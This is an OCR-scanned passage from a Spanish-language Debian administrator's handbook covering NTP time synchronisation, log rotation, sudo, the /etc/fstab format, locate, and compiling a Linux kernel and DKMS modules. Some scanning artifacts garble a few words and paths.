a  estar  sobrecargados.  Es  por  eso  que  recomendamos  utilizar  el  servidor  NTP 
pool.ntp.org  que  es,  en  realidad,  un  grupo  de  maquinas  que  acordaron  servir  como 
servidores  NTP  publicos.  Inclusive  puede  limitar  el  uso  a  un  subgrupo  especifico  de 
un  pai's  con,  por  ejemplo,  us.pool.ntp.org  para  Estados  Unidos  o  ca.pool.ntp.org 
para  Canada,  etc. 

Sin  embargo,  si  administra  una  red  grande,  se  recomienda  que  instale  su  propio 
servidor  NTP  que  sincroniza  con  servidores  publicos.  En  este  caso,  todos  los  otros 
equipos  en  su  red  pueden  utilizar  su  servidor  NTP  interno  en  lugar  de  aumentar 
la  carga  en  los  servidores  publicos.  Tambien  aumentara  la  homogeneidad  de  sus 
relojes  ya  que  todos  los  equipos  estaran  sincronizados  desde  la  misma  fuente  y 
esta  fuente  se  encuentra  muy  cerca  en  cuestiones  de  tiempos  de  tranferencia  en  la 
red. 


La  sincronizacion  de  tiempo,  que  puede  parecer  superfluo  en  un  equipo,  es  muy  importante  en 
una  red.  Debido  a  que  los  usuarios  no  tienen  permisos  para  modificar  la  fecha  y  hora  es  impor¬ 
tante  que  esta  informacion  sea  precisa  para  evitar  confusion.  Lo  que  es  mas,  tener  sincronizados 
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todos  los  equipos  de  una  red  permite  cruzar  referencias  de  informacion  en  registros  de  diferen- 
tes  maquinas.  Por  lo  tanto,  en  caso  de  un  ataque,  es  mas  sencillo  reconstruir  la  secuencia  cro- 
nologica  de  acciones  en  todos  los  equipos  involucrados  en  el  mismo.  Los  datos  recolectados  en 
varios  equipos  por  motivos  estadisticos  no  tendran  demasiado  sentido  si  no  estan  sincronizados. 


Para  estaciones  de  trabajo 

Debido  a  que  las  estaciones  de  trabajo  son  reiniciadas  frecuentemente  (aunque  solo  sea  pa¬ 
ra  ahorrar  energia),  sincronizarlas  por  NTP  al  inicio  es  suficiente.  Para  hacerlo,  simplemen- 
te  instale  el  paquete  ntpdate.  Puede  cambiar  el  servidor  NTP  utilizado  modificando  el  archivo 
/etc/default/ntpdate. 


Para  servidores 

Los  servidores  rara  vez  son  reiniciados  y  es  muy  importante  que  la  hora  de  estos  sistemas  sea 
correcta.  Para  mantener  la  hora  correcta  debe  instalar  un  servidor  NTP  local,  un  servicio  ofre- 
cido  en  el  paquete  ntp.  En  su  configuracion  predeterminada  el  servidor  se  sincronizara  con 
pool.ntp.org  y  proveera  la  hora  como  respuesta  a  pedidos  que  provengan  de  la  red  local.  Puede 
configurarlo  editando  el  archivo  /etc/ntp .  conf,  siendo  la  alteracion  mas  importante  el  ser¬ 
vidor  NTP  al  que  se  refiere.  Si  la  red  tiene  muchos  servidores  podria  ser  interesante  tener  un 
servidor  de  tiempo  local  que  sincroniza  con  los  servidores  publicos  y  es  utilizado  como  fuente 
de  tiempo  por  los  demas  servidores  de  la  red. 


YENDO  MAS  ALLA  Si  la  sincronizacion  de  tiempo  es  particularmente  crucial  en  su  red  es  posible  equi- 
Modulos  GPS  y  otras  Par  un  servidor  con  un  modulo  GPS  (que  utilizara  la  hora  de  satelites  GPS)  o  un 

fuentes  de  tiempo  modulo  DCF-77  (que  sincronizara  la  hora  con  el  reloj  atomico  cerca  de  Frankfurt, 

Alemania).  en  este  caso,  la  configuracion  del  servidor  NTP  es  un  poco  mas  compli- 
cada  y  necesitara  consultar  la  documentacion. 


8.9.3  Rotacion  de  archivos  de  registro 

Los  archivos  de  registro  pueden  crecer,  rapido,  y  es  necesario  archivarlos.  El  esquema  mas  co- 
mun  es  un  archivado  rotativo:  el  archivo  de  registro  es  almacenado  regularmente  y  solo  se  man- 
tienen  los  ultimos  X  archivos.  Log  rotate,  el  programa  responsable  de  estas  rotaciones,  respon- 
de  alas  directivas  presentes  en  el  archivo  /etc/log rotate y  todos  los  archivos  en  el  directorio 
/etc/log rotate .  d/.  El  administrador  puede  modificar  estos  archivos  si  desean  adaptar  la  poli- 
tica  de  rotacion  de  registros  definida  por  Debian.  La  pagina  de  manual  log  rotate  ( 1 )  describe 
todas  las  opciones  disponibles  en  estos  archivos  de  configuracion.  Podria  desear  aumentar  la 
cantidad  de  archivos  mantenidos  en  la  rotacion  o  mover  los  archivos  de  registros  a  un  direc¬ 
torio  especifico  dedicado  a  su  archivado  en  lugar  de  eliminarlos.  Tambien  puede  enviarlo  por 
email  para  archivarlos  en  otro  lado. 
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El  programa  log  rotate  es  ejecutado  diariamente  por  la  aplicacion  c  ron  (descripta  en  la  Seccion 
9.7,  «Programacion  de  tareas  con  cron  y  atd»  pagina  218). 


8.9.4.  Comparticion  de  permisos  de  administracion 

Frecuentemente,  muchos  administradores  trabajan  en  la  misma  red.  Compartir  contrasenas  de 
root  no  es  muy  elegante  y  abre  la  puerta  al  abuso  debido  al  anonimato  generado.  La  solucion 
a  este  problema  es  el  programa  sudo  que  permite  a  ciertos  usuarios  ej  ecu  tar  ciertas  ordenes 
con  permisos  especiales.  En  el  caso  de  uso  mas  comun,  sudo  permite  a  un  usuario  confiable 
ejecutar  cualquier  orden  como  root.  Para  hacerlo,  el  usuario  simplemente  ejecuta  sudo  progr 
ama  y  provee  su  contraseiia  personal  como  autenticacion. 

Al  instarlarlo,  el  paquete  sudo  le  provee  permisos  de  root  completes  a  los  miembros  del  grupo 
Unix  sudo.  Para  delegar  otros  permisos  el  administrador  debe  utilizar  el  programa  visudo  que 
le  permitira  modificar  el  archivo  de  configuracion  /etc/sudoe  rs  (aqui  nuevamente  se  invocara 
el  editor  vi  o  cualquier  editor  indicado  en  la  variable  de  entorno  EDITOR).  Agregar  una  linea  con 
usuario  ALL=(ALL)  ALL  permite  al  usuario  en  cuestion  ejecutar  cualquier  programa  como  root. 

Configuraciones  mas  sofisticadas  permiten  autorizar  solo  ordenes  especificas  a  usuarios  especi- 
ficos.  La  pagina  de  manual  sudoers  (5)  provee  todos  los  detalles  de  las  varias  posibilidades. 


8.9.5  Lista  de  puntos  de  montaje 


VOLVER  A  LOS  CIMIENTOS  En  un  sistema  similar  a  Unix  como  Debian,  los  archivos  estan  organizados  en  solo 

Montado  y  desmontado  una  jerarqui'a  de  directorios  similar  a  un  arbol.  El  directorio  /  se  llama  «directorio 

rai'z»;  todos  los  directorios  adicionales  son  subdirectories  en  esta  raiz.  «Montar»  es 
la  accion  de  incluir  el  contenido  de  un  dispositivo  periferico  (generalmente  un  dis¬ 
co  duro)  en  el  arbol  de  archivos  general  del  sistema.  Como  consecuencia,  si  utiliza 
discos  duros  diferentes  para  almacenar  los  datos  personales  de  los  usuarios  estos 
discos  tendran  que  «montarse»  en  el  directorio  /home/.  El  sistema  de  archivos  rafz 
siempre  es  montado  durante  el  arranque  por  el  nucleo;  los  demas  dispositivos  ge¬ 
neralmente  son  montados  durante  la  secuencia  de  inicio  o  manualmente  con  el 
programa  mount. 

Algunos  dispositivos  removibles  son  montados  automaticamente  al  conectarse,  es- 
pecialmente  cuando  utiliza  GNOME,  KDE  u  otro  entorno  grafico  de  escritorio.  El 
usuario  tendra  que  montar  manualmente  otros  dispositivos.  De  la  misma  forma, 
debera  desmontarlos  (quitarlos  del  arbol  de  archivos).  Usuarios  normales  general¬ 
mente  no  tienen  los  permisos  para  ejecutar  mount  y  umount.  El  administrador  pue- 
de,  sin  embargo,  autorizar  estas  operaciones  (independientemente  para  cada  punto 
de  montaje)  incluyendo  la  opcion  user  en  el  archivo  /etc/f  stab. 

Puede  utilizar  el  programa  mount  sin  parametros  (enumerara  todos  los  sistemas  de 
archivos  montados).  Si  desea  montar  o  desmontar  un  dispositivo  necesitara  ana- 
dirle  algunos  parametros.  Para  la  lista  completa,  revise  las  siguientes  paginas  de 
manual:  mount(8)  yumount(8).  Para  casos  simples,  la  sintaxis  tambien  es  simple: 
por  ejemplo,  para  montar  la  particion  /dev/sdcl,  que  tiene  un  sistema  de  archivos 
ext3,  en  el  directorio /mnt/tmp/ ejecute  mount  -t  ext3  /dev/sdcl  /mnt/tmp/. 
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El  archivo  /etc/f  stab  tiene  una  lista  de  todos  los  montajes  posibles  que  pueden  ocurrir  auto¬ 
maticamente  durante  el  inicio  o  manualmente  para  dispositivos  de  almacenamiento  removibles. 
Se  describe  cada  punto  de  montaje  en  una  lrnea  con  varios  campos  separados  por  espacios: 

■  dispositivo  a  montar:  puede  ser  una  particion  local  (disco  duro,  CD-ROM)  o  sistema  de 
archivos  remoto  (como  NFS). 

Generalmente  se  reemplaza  este  campo  con  el  ID  unico  del  sistema  de  archivos  (que  puede 
encontrar  con  blkid  dispositivo)  con  el  prefijo  UUID=.  Esto  previene  problemas  con 
cambios  en  el  nombre  del  dispositivo  en  caso  de  agregar  o  eliminar  discos  o  si  se  detectan 
los  discos  en  un  orden  diferente. 

■  punto  de  montaje:  esta  es  la  ubicacion  del  sistema  de  archivos  local  donde  se  montara  el 
dispositivo,  sistema  remoto  o  particion. 

■  tipo:  este  campo  define  el  sistema  de  archivos  utilizado  en  el  dispositivo  montado.  Algunos 
ejemplos  son  ext4,  ext3,  vfat,  ntfs,  btrfsy  xfs. 

VOLVER  A  LOS  CIMIENTOS  NFS  es  un  sistema  de  archivos  de  red;  en  Linux  permite  acceso  transparen- 
NFS  un  sistema  de  te  a  sistemas  de  archivos  remotos  incluyendolos  en  el  sistema  de  archivos 

archivos  de  red  local . 

Puede  encontrar  una  lista  de  todos  los  sistemas  de  archivos  conocidos  en  la  pagina  de  ma¬ 
nual  mount  (8).  El  valor  especial  swap  es  para  particiones  swap;  el  valor  especial  auto  le 
dice  al  programa  mount  que  detecte  automaticamente  el  sistema  de  archivos  (que  es  espe- 
cialmente  util  para  lectores  de  discos  y  Haves  USB  ya  que  cada  una  puede  tener  diferentes 
sistemas  de  archivos); 

■  opciones:  hay  muchas,  dependiendo  del  sistema  de  archivos,  y  estan  documentadas  en  la 
pagina  de  manual  de  mount.  Las  mas  comunes  son 

•  rw  o  ro  que  significan  que  se  montara  el  dispositivo  con  permisos  de  lectura  y  escri- 
tura  o  solo  lectura,  respectivamente. 

•  noauto  desactiva  el  montaje  automatico  durante  el  arranque. 

•  nofail  permite  continuar  al  proceso  de  arranque  incluso  aunque  un  dispositivo  no 
este  presente.  Asegurese  de  poner  esta  opcion  para  los  discos  externos  que  puedan 
estar  desconectados  durante  el  arranque,  porque  systemd  se  asegura  de  que  todos 
los  puntos  de  montaje  que  deban  montarse  automaticamente  estan  realmente  mon- 
tados  antes  de  permitir  que  continue  el  proceso.  Puede  combinar  esto  con  x-systemd. 
device-timeout=5s  para  instruir  a  systemd  para  que  no  espere  mas  de  5  segundos  pa¬ 
ra  que  aparezca  el  dispositivo  (vease  systemd  .mount  (5)). 

•  user  autoriza  a  todos  los  usuarios  a  montar  este  sistema  de  archivos  (una  operacion 
que  de  otra  forma  estarfa  restringida  solo  al  usuario  root). 

•  defaults  es  un  sinonimo  de  la  lista  de  opciones  predeterminada:  rw,  suid,  dev,  exec, 
auto,  nouser  y  async,  cada  una  de  las  cuales  puede  ser  desactivada  luego  de  defaults 
agregando  nosuid,  nodev,  etc.  parabloquear  suid,  dev,  etc.  respectivamente.  Agregar 
la  opcion  user  lo  reactivaya  que  defaults  incluye  nouser. 

■  respaldo:  este  campo  casi  siempre  esta  definido  como  0.  Cuando  es  1  le  dice  a  la  herra- 
mienta  dump  que  la  particion  contiene  datos  que  deben  ser  respaldados. 
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■  orden  de  revision:  este  ultimo  campo  indica  si  se  debe  revisar  la  integridad  del  sistema 
de  archivos  durante  el  inicio  y  en  que  orden  debe  ejecutarse  esta  revision.  Si  es  0  no  se 
realizaran  revisiones.  El  sistema  de  archivos  raiz  deberfa  tener  el  valor  1  mientras  que 
otros  sistemas  de  archivos  permanentes  deberian  tener  el  valor  2. 

Ejemplo  8.5  Ejemplo  del  archivo  /etc/ f stab 

#  /etc/f stab :  informacion  de  sistemas  de  archivos  estaticos 

# 

#  <sistema  de  archivos>  <punto  de  montaje>  <tipo>  <opciones>  <respaldo>  < 

revision> 

proc  /proc  proc  defaults  0  0 

#  /  era  /dev/sdal  durante  la  instalacion 

UUID=c964222e-6afl-4985-be04-19d7c764d0a7  /  ext3  errors=remount- ro  0  1 

#  swap  se  encontraba  en  /dev/sda5  durante  la  instalacion 

UUID=ee880013-0f63-4251-b5c6-b771f 53bd90e  none  swap  sw  0  0 

/dev/scd0  /media/cdrom0  udf,iso9660  user, noauto  0  0 

/dev/fd0  /media/floppy  auto  rw, user, noauto  0  0 

arrakis : /shared  /shared  nfs  defaults  0  0 

El  ultimo  elemento  en  este  ejemplo  corresponde  a  un  sistema  de  archivos  de  red  (NFS):  se  mon- 
tara  el  directorio  /shared/  en  el  servidor  arrakis  en  /shared/  en  la  maquina  local.  El  formato 
del  archivo  /etc/f stab  esta  documentado  en  la  pagina  de  manual  f  stab (5). 


YENDO  MAS  ALLA  El  paquete  am-utils  provee  la  herramienta  de  automontaje  amd,  capaz  de  montar 
Automontaje  medios  removibles  a  pedido  cuando  un  usuario  intenta  acceder  su  punto  de  monta- 
je  usual.  Desmontara  estos  dispositivos  cuando  ningun  proceso  los  este  accediendo. 

Existen  otras  herramientas  de  automontaje  como  automount  en  el  paquete  autofs. 

Sepa  que  GNOME,  KDE  y  otros  entornos  graficos  de  escritorio  trabajan  junto  con 
udisk  y  pueden  montar  automaticamente  medios  removibles  cuando  son  conecta- 
dos. 


8.9.6  locate  y  updatedb 

El  programa  locate  puede  encontrar  la  ubicacion  de  un  archivo  cuando  solo  conozca  parte 
del  nombre.  Devuelve  un  resultado  casi  instantaneamente  ya  que  consulta  una  base  de  datos 
que  almacena  la  ubicacion  de  todos  los  archivos  del  sistema;  se  actualiza  esta  base  de  datos 
diariamente  con  updatedb.  Existen  varias  implementaciones  de  locate  y  Debian  eligio  mlocate 
para  su  sistema  estandar. 

mlocate  es  suficientemente  inteligente  y  solo  devolvera  archivos  a  los  que  el  usuario  que  lo 
ejecuto  puede  acceder  a  pesar  de  que  utiliza  una  base  de  datos  que  conoce  sobre  todos  los  ar¬ 
chivos  en  el  sistema  (ya  que  su  implementacion  de  updatedb  ejecuta  con  permisos  de  root).  El 
administrador  puede  utilizar  PRUNEDPATHS  en  /etc/updatedb .  conf  para  excluir  la  indexacion 
de  algunos  directories  y  lograr  seguridad  adicional. 
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8.10.  Compilacion  de  un  nucleo 


El  nucleo  que  provee  Debian  incluye  la  mayor  cantidad  de  funcionalidad  posible  asi  como  tam¬ 
bien  la  mayor  cantidad  de  controladores  para  cubrir  el  espectro  mas  amplio  de  configuraciones 
de  hardware.  Es  por  esto  que  algunos  usuarios  prefieren  compilar  el  nucleo  para  incluir  sola- 
mente  lo  que  necesiten  especfficamente.  Hay  dos  razones  para  esta  eleccion.  Primero,  podrfa 
optimizar  el  consumo  de  memoriaya  que  el  codigo  del  nucleo,  aun  cuando  no  sea  utilizado,  ocu- 
pa  memoria  por  nada  (y  nunca  es  «bajado»  al  espacio  de  swap  ya  que  utiliza  RAM  real)  lo  que 
puede  disminuir  el  rendimiento  general  del  sistema.  Un  nucleo  compilado  localmente  tambien 
puede  limitar  el  riesgo  de  problemas  de  seguridadya  que  solo  se  compilay  ejecuta  una  fraccion 
del  codigo  del  nucleo. 


NOTA 

Si  decide  compilar  su  propio  nucleo,  debe  aceptar  las  consecuencias:  Debian  no  pue- 

Actualizaciones  de 
seguridad 

de  asegurar  actualizaciones  de  seguridad  para  su  nucleo  personalizado.  Al  matener 
el  nucleo  que  provee  Debian  se  beneficia  de  las  actualizaciones  preparadas  por  el 
equipo  de  seguridad  del  Proyecto  Debian. 

Necesita  ademas  recompilar  el  nucleo  si  desea  utilizar  ciertas  funcionalidades  que  solo  estan 
disponibles  como  parches  (y  no  estan  incluidas  en  la  version  estandar  del  nucleo). 

YENDO  MAS  ALLA 

El  equipo  del  nucleo  de  Debian  administra  el  «Libro  del  nucleo  de  Debian» 

El  libro  del  nucleo  de 
Debian  («Debian  Kernel 
Handbook») 

(«Debian  Kernel  Handbooks  disponible  tambien  en  el  paquete  debian-kernel- 
handbook)  que  contiene  documentacion  exhaustiva  sobre  la  mayoria  de  las  tareas 
relacionadas  con  el  nucleo  y  como  se  gestionan  los  paquetes  Debian  oficiales  del 
nucleo.  Este  es  el  primer  lugar  en  el  que  deberia  buscar  si  necesita  mas  informacion 
que  la  que  provee  esta  seccion. 

•-  http : //kernel- handbook . alioth . debian . org 

8.10.1.  Introduccion  y  prerequisites 

No  es  sorprendete  que  Debian  administre  el  nucleo  como  un  paquete,  que  no  es  la  forma  tradicio- 
nal  en  la  que  se  compilan  e  instalan  nucleos.  Debido  a  que  el  nucleo  se  mantiene  bajo  el  control 
del  sistema  de  paquetes  puede  ser  eliminado  limpiamente  o  desplegado  en  varias  maquinas.  Lo 
que  es  mas,  los  scripts  asociados  con  estos  paquetes  automatizan  la  interaccion  con  el  gestor  de 
arranque  y  el  generador  de  initrd. 

Las  fuenes  de  Linux  en  origen  contienen  todo  lo  necesario  para  crear  el  paquete  Debian  del  nu¬ 
cleo.  Sin  embargo,  necesitara  instalar  build-essential  para  asegurarse  que  posee  las  herramientas 
necesarias  para  crear  un  paquete  Debian.  Lo  que  es  mas,  el  paso  de  configuracion  para  el  nucleo 
necesita  el  paquete  libncurses5-dev.  Linalmente,  el  paquete  fakeroot  le  permitira  crear  el  paquete 
Debian  sin  utilizar  permisos  de  administrador. 
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CULTURA  Antes  que  el  sistema  de  compilacion  de  Linux  tuviera  la  capacidad  de  crear  paque- 
Los  dias  de  kernel-package  tes  Debian  apropiados,  la  forma  recomendada  de  crear  dichos  paquetes  era  utilizar 

make-kpkg,  incluldoen  el  paquete  kernel-package. 


8.10.2.  Obtencion  de  las  fuentes 

Como  cualquier  cosa  que  pueda  ser  util  en  un  sistema  Debian,  las  fuentes  del  nucleo  Linux  estan 
disponibles  en  un  paquete.  Para  obtenerlas  simplemente  instale  el  paquete  linux-source-ve rsion. 
Puede  ver  las  diferentes  versiones  del  nucleo  empaquetados  por  Debian  con  apt  -  cache  search 
"Linux-  sou  rce.  La  ultima  version  esta  disponible  en  la  distribucion  Unstable:  puede  conseguir- 
las  sin  demasiado  riesgo  (especialmente  si  tiene  configurado  APT  segun  las  instrucciones  de  la 
Seccion  6.2.6,  «Trabajo  con  varias  distribuciones»  pagina  12l).  Sepa  que  el  codigo  fuente  que 
contienen  estos  paquetes  no  corresponde  exactamente  con  lo  publicado  por  Linus  Torvalds  y 
los  desarrolladores  del  nucleo;  como  todas  las  distribuciones,  Debian  aplica  una  serie  de  par¬ 
ches,  que  pueden  (o  no)  ser  incluidas  en  la  version  de  origen  de  Linux.  Estas  modificaciones 
incluyen  retroadaptaciones  de  correcciones/funcionalidades/controladores  de  nuevas  versio¬ 
nes  del  nucleo,  funcionalidades  que  no  estan  (completamente)  incluidas  en  el  arbol  de  origen 
de  Linux  e  inclusive  a  veces  cambios  especificos  para  Debian. 

El  resto  de  esta  seccion  se  concentra  en  la  version  3 .16  del  nucleo  Linux  pero  los  ejemplos  pueden, 
obviamente,  adaptarse  a  la  version  particular  del  nucleo  que  desee. 

Asumimos  que  instalo  el  paquete  linux-source-3.16.  Contiene  /us  r/s  rc/linux- sou  rce- 3 . 16 . 
tar.xz,  un  compendio  comprimido  de  las  fuentes  del  nucleo.  Debe  extraer  estos  archivos  en 
un  nuevo  directorio  (no  directamente  bajo  /usr/src/  ya  que  no  necesita  permisos  especiales 
para  compilar  un  nucleo  Linux):  -/kernel/  es  apropiado. 

$  mkdir  -/kernel;  cd  -/kernel 
$  tar  -xaf  /usr/src/linux-source-3. 16. tar.xz 


CULTURA 

Ubicacion  de  las  fuentes 
del  nucleo 


Tradicionalmente,  las  fuentes  del  nucleo  Linux  estari'an  ubicadas  en  /usr/src/ 
Linux/  lo  que  necesitarfa  permisos  de  root  para  compilarlo.  Sin  embargo,  se  de¬ 
be  evitar  trabajar  con  permisos  de  administracion  cuando  no  es  necesario.  Existe 
un  grupo  src  que  permite  a  sus  miembros  trabajar  en  este  directorio,  pero  debe 
evitar  trabajar  en  /usr/src/  de  todas  formas.  Al  mantener  las  fuentes  del  nucleo 
en  un  directorio  personal  obtiene  seguridad  en  todos  lados:  no  existiran  archivos 
en  /usr/  ajenos  al  sistema  de  paquetes  y  no  hay  riesgos  de  despistar  a  los  progra- 
mas  que  leen  /usr/src/Linux  al  intentar  conseguir  informacion  sobre  el  nucleo 
utilizado. 


8.10.3.  Configuracion  del  nucleo 

El  siguiente  paso  consiste  en  configurar  el  nucleo  segun  sus  necesidades.  El  procedimiento  exac- 
to  depende  de  los  objetivos. 
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Al  recompilar  una  version  mas  reciente  del  nucleo  (posiblemente  con  un  parche  adicional),  pro- 
bablemente  mantenga  la  configuracion  tan  parecida  a  la  propuesta  por  Debian  como  le  sea  po- 
sible.  En  este  caso,  y  en  lugar  de  reconfigurar  todo  desde  cero,  es  suficiente  copiar  el  archivo 
/boot/config  -version  (la  version  es  la  del  nucleo  utilizado  actualmente,  que  puede  encontrar- 
se  con  uname  -  r)  en  un  archivo  .  conf  ig  en  el  directorio  que  contenga  las  fuentes  del  nucleo. 


$  cp  /boot/config-3.16.0-4-amd64  ~/kernel/linux-source-3 . 16/ . config 


A  menos  que  necesite  cambiar  la  configuracion,  puede  parar  aqui  y  continua  en  Seccion  8.10.4, 
«Compilacion  y  creacion  del  paquete»  pagina  187.  Si,  por  el  otro  lado,  necesita  cambiarla  o  si 
decide  reconfigurar  todo  desde  cero,  debe  tomarse  el  tiempo  de  configurar  su  nucleo.  Hay  varias 
interfaces  dedicadas  en  el  directorio  de  fuentes  del  nucleo  que  puede  utilizar  ejecutando  make 
objetivo  donde  objetivo  es  uno  de  los  valores  descriptos  a  continuacion. 

make  menuconf  ig  compila  y  ejecuta  una  interfaz  en  modo  texto  (aqui  es  donde  necesita  el  pa- 
quete  libncurses5-dev )  que  permite  navegar  entre  las  opciones  disponibles  en  una  estructura 
jerarquica.  Pulsar  la  tecla  Espacio  cambia  el  valor  de  la  opcion  seleccionada  y  Enter  valida  el 
boton  seleccionado  al  pie  de  la  pantalla;  Seleccionar  vuelve  al  submenu  seleccionado;  Salir  cie- 
rra  la  pantalla  actual  y  vuelve  un  paso  atras  en  la  jerarquia;  Ayuda  mostrara  informacion  mas 
detallada  sobre  el  comportamiento  de  la  opcion  seleccionada.  Las  teclas  de  flecha  le  permiten 
moverse  en  la  lista  de  opciones  y  botones.  Para  salir  del  programa  de  configuracion,  seleccione 
Salir  del  menu  principal.  El  programa  luego  ofrece  guardar  los  cambios  que  realizo;  aceptelos  si 
esta  satisfecho  con  sus  selecciones. 

Otras  interfaces  tienen  funcionalidades  similares  pero  trabajan  con  interfaces  graficas  mas  mo- 
dernas;  como  make  xconfig  que  utiliza  una  interfaz  grafica  Qt  y  make  g  con  fig  que  utiliza 
GTK+.  La  primera  necesita  el  paquete  libqt4-dev  mientras  que  la  ultima  depende  de  los  paque- 
tes  libglade2-dev  y  libgtk2.0-dev. 

Cuando  utiliza  una  de  las  interfaces  de  configuracion,  siempre  es  buena  idea  comenzar  des¬ 
de  una  configuracion  predeterminada  razonable.  El  nucleo  provee  tales  configuraciones  en 
a rch/ar<7uitectura/configs/*_def config  y  puede  mover  la  configuracion  que  desee  si  eje¬ 
cuta  algo  similar  a  make  x86_64_def config  (en  el  caso  de  un  equipo  de  64  bits)  o  make 
i386_defconfig  (en  el  caso  de  un  equipo  de  32  bits). 


SEGURIDAD  Cuando  provee  un  archivo  .config  que  fue  generado  con  otra  version  del  nucleo 
Gestion  de  archivos  (generalmente  anterior),  tendra  que  actualizarlo.  Puede  hacerlo  ejecutando  make 
config  desactualizados  oldconfig,  que  le  preguntara  interactivamente  las  preguntas  que  corresponden 

a  las  nuevas  opciones  de  configuracion.  Si  desea  utilizar  una  respuesta  predeter¬ 
minada  a  todas  estas  preguntas,  puede  ejecutar  make  olddef  conf  ig.  Con  make 
oldnoconf  ig,  se  asumira  una  respuesta  negativa  a  todas  las  preguntas. 
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8.10.4.  Compilacion  y  creacion  del  paquete 


NOTA  Si  ya  realizo  una  compilacion  en  el  directorio  y  desea  reconstruir  todo  desde  cero 
Limpieza  antes  de  (por  e j e m P I ° :  porque  realizo  cambios  importantes  a  la  configuracion  del  nucleo), 
recompilar  tendra  que  ejecutar  make  clean  para  eliminar  los  archivos  compilados.  make  di 
stclean  elimina  todavia  mas  archivos  generados,  incluyendo  tambien  su  archivo 
.  conf  ig,  por  lo  que  debera  asegurarse  de  respaldarlo  primero. 


Una  vez  que  esta  lista  la  configuracion  del  nucleo,  simplemente  ejecutar  make  de b  - p kg  genera- 
ra  hasta  5  paquetes  Debian:  linux-image-ve rsion  que  contiene  la  imagen  del  nucleo  y  los  modulos 
asociados,  linux-headers-ve rsion  que  contiene  los  archivos  de  cabecera  necesarios  para  crear  mo¬ 
dulos  externos,  linux-firmware-image-ve rsion  que  contiene  los  archivos  de  firmware  necesarios 
para  algunos  controladores  (este  paquete  puede  no  estar  presente  cuando  se  compila  el  kernel  a 
partir  de  las  fuentes  proporcionadas  por  Debian),  linux-image-version-dbg  que  contiene  los  sim- 
bolos  de  depuracion  para  la  imagen  del  nucleo  y  sus  modulos  y  linux-libc-dev  que  contiene  las 
cabeceras  relevantes  a  algunas  bibliotecas  de  espacio  de  usuario  como  glibc  de  GNU. 

La  cadena  version  es  la  concatenacion  de  la  version  de  origen  (definida  por  las  variables 
VERSION,  PATCHLEVEL,  SUBLEVEL  y  EXTRAVERSION  en  el  archivo  Makefile),  el  parame- 
tro  de  configuracion  LOCALVERSION  y  la  variable  de  entorno  LOCALVERSION.  La  version 
del  paquete  reutiliza  la  misma  cadena  de  version  con  una  revision  adicional  que  generalmen- 
te  aumenta  (y  es  almacenada  en  .version),  excepto  si  lo  previene  con  la  variable  de  entorno 
KDEBPKGVERSION. 

$  make  deb-pkg  LOCALVERSION=-falcot  KDEB_PKGVERSION=$ (make  kernelversion) -1 

[...] 

$  Is  . ./*.deb 

. . /I in ux- headers -3 . 16 . 7-ckt4-falcot_3 .16.7- l_amd64 .deb 
. . /I in ux- image -3 . 16.7-ckt4-falcot  3. 16.7-1  amd64. deb 
. . /I in ux- image -3 . 16 . 7-ckt4- f alcot -dbg_3 .16.7- l_amd64 . deb 
. ./linux-libc-dev  3. 16.7-1  amd64. deb 


8.10.5  Compilacion  de  modulos  externos 

Se  mantienen  algunos  modulos  fuera  del  nucleo  Linux  oficial.  Para  utilizarlos  debe  compilarlos 
junto  al  nucleo  correspondiente.  Debian  provee  algunos  modulos  de  terceros  comunes  en  pa¬ 
quetes  dedicados,  como  xtables-addons-source  (modulos  adicionales  para  iptables)  o  oss4-source 
(«Open  Sound  System»,  algunos  controladores  de  audio  alternatives). 

Estos  paquetes  externos  son  muchos  y  variados  y  no  los  enumeraremos  todos  aquf;  puede  limitar 
el  campo  debusqueda  con  apt -cache  search  source$.  Sin  embargo,  una  lista  completa  no  es 
muy  util  ya  que  no  hay  una  razon  particular  para  compilar  modulos  externos  a  menos  que  sepa 
que  los  necesita.  En  estos  casos,  la  documentacion  del  dispositivo  tipicamente  detallara  el  o  los 
modulos  especificos  que  necesita  para  funcionar  bajo  Linux. 
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Veamos,  por  ejemplo,  el  paquete  virtualbox-source :  luego  de  instalarlo  podra  encontrar  un  com- 
pendio  .tar.bz2  de  las  fuentes  del  modulo  en  /usr/src/.  Si  bien  podriamos  extraer  manual- 
mente  el  archivo  y  compilar  el  modulo,  en  la  practica  preferimos  automatizarlo  con  DKMS.  La 
mayorfa  de  los  modulos  ofrecen  la  integracion  necesaria  con  DKMS  en  un  paquete  que  finaliza 
con  el  sufijo  -dkms.  En  nuestro  caso,  solo  necesitamos  instalar  el  paquete  xtables-addons-dkms 
para  compilar  el  modulo  del  nucleo  para  el  nucleo  actual,  siempre  que  este  instalado  el  paque¬ 
te  linux-headers-*  que  coincida  con  el  nucleo  instalado.  Por  ejemplo,  si  utiliza  linux-image-amd64 
deberia  instalar  tambien  linux-headers-amd64. 


$  sudo  apt  install  xtables-addons-dkms 

[...] 

Setting  up  xtables-addons-dkms  (2.6-1)  ... 
Loading  new  xtables-addons-2 .6  DKMS  files... 
First  Installation:  checking  all  kernels... 
Building  only  for  3. 16.0-4-amd64 
Building  initial  module  for  3. 16.0-4-amd64 
Done . 


xt  ACCOUNT: 

Running  module  version  sanity  check. 

-  Original  module 

-  No  original  module  exists  within  this  kernel 

-  Installation 

-  Installing  to  /lib/modules/3 . 16 . 0-4-amd64/updates/dkms/ 

[...] 


DKMS:  install  completed. 

$  sudo  dkms  status 

xtables-addons,  2.6,  3. 16.0-4-amd64,  x86_64:  installed 

$  sudo  modinfo  xt  ACCOUNT 


filename : 
license : 
alias : 
author: 
description : 
[■■■] 


/lib/modules/3 . 16 . 0-4-amd64/updates/dkms/xt_ACCOUNT. ko 
GPL 

ipt  ACCOUNT 

Intra2net  AG  <opensource@intra2net . com> 

Xtables:  per-IP  accounting  for  large  prefixes 


ALTERNATIVA  Antes  de  DKMS,  module-assistant  era  la  solucion  mas  simple  para  compi- 
module-assistant  ^ar  Y  desplegar  modulos  del  nucleo.  Todavia  puede  utilizarlo,  especialmente 
con  paquetes  que  no  poseen  integracion  con  DKMS:  simplemente  ejecutando 
module-assistant  auto-install  xtables-addons  (o  su  version  corta:  m-a  a- 
i  xtables-addons)  se  compilara  el  modulo  para  el  nucleo  actual,  se  creara  un 
nuevo  paquete  Debian  que  lo  contiene  y  se  lo  instalara  automaticamente. 
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8.10.6.  Aplicacion  de  un  parche  al  nucleo 


Algunas  funcionalidades  no  estan  incluidas  en  el  nucleo  estandar  debido  a  falta  de  madurez  o 
algun  desacuerdo  con  los  encargados  del  nucleo.  Dichas  funcionalidades  pueden  ser  distribuidas 
como  parches  que  cualquiera  puede  aplicar  a  las  fuentes  del  nucleo. 

